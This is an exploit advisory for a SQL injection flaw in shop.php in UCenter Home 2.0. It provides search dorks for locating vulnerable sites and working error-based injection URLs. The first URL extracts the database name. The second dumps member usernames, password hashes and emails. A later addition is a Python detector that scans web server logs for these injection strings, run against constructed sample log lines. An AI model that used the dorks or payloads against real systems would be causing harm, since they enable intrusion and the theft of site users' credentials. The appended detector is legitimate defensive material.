__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability type : SQL Injection (MySQL Error Based)

Required materials : Hex conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For injection : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
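
For defenders reviewing web server logs: the added example below (not part of the original advisory) flags requests to shop.php with ac=view whose shopid is not a plain integer or carries fragments of the error-based strings quoted above. The log lines are constructed samples; the function names and the combined log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Fragments of the error-based strings quoted in the advisory above.
SQLI_TOKENS = ("information_schema", "floor(rand(", "concat(", "group by")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(log_line):
    """Return a list of reasons a shop.php?ac=view hit looks like SQLi, or []."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %20 and '+'
    if "view" not in params.get("ac", []):
        return []
    reasons = []
    for value in params.get("shopid", []):
        # A legitimate shop id is a plain integer; anything else is suspect.
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-numeric shopid")
        squeezed = re.sub(r"\s+", " ", value.lower())
        reasons += ["token:" + t for t in SQLI_TOKENS if t in squeezed]
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reasons = inspect_request(line)
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2011:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%20count(*),'
    'concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group+by%20x) HTTP/1.1" 200 944',
    '203.0.113.7 - - [01/Jan/2011:10:01:00 +0000] "GET /index.php?ac=view&shopid=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, ", ".join(reasons))
```

Parameters sent in a POST body do not appear in access logs, so this check only covers query-string requests.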